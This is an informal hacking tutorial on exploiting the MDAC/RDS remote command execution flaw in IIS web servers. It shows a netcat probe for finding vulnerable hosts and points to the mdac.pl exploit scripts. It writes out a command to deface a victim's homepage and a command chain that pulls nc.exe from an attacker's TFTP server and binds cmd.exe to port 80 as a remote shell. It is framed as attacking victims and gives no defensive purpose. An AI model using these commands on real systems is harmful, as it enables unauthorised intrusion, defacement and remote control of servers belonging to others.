MDAC- Local Command Execution

You might think that it is a years-old vulnerability, however what i see on pen-tests is that almost 40% of IIS web servers are still vulnerable to this.
IIS' MDAC component has a vulnerability where an attacker can submit commands for local execution.
The core problem is with the RDS Datafactory. By default, it allows remote commands to be sent to the IIS server. The commands will be run as the effective user of the service, which is typically the SYSTEM user.
I wont get into details, if you want go and check RFP's web site. However, you can find a vulnerable site by checking 

c:\>nc -nw -w 2 80 

GET /msadc/msadcs.dll HTTP

and if you get the following

application/x_varg

it is most probably vulnerable if not patched.

You can find the exploit, mdac.pl and msadc2.pl from rain forest puppy's web site at www.wiretrip.net/rfp It checks for the vulnerability and if it is vulnerable then it asks for the command you wanna execute:

c:\> mdac.pl -h

Please type the NT commandline you want to run (cmd /c assumed):\n

cmd /c

if you wanna change the web site which is located at

d:\inetpub\wwwroot\victimweb\index.htm
 
then you can type:

cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm

or what ever you want but my personnal preference is uploading our swiss army knife, netcat, and binding it to the cmd.exe to the port 80. To do that set up your TFTP server and put nc.exe in it. Then when you are asked to type the command you want to execute, for example type the following:

cmd/c cd %systemroot%&&tftp -i GET nc.exe&&del ftptmp && attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe

there you go, go on fire your netcat against the victim over port 80, you get the eggshell, cmd.exe.....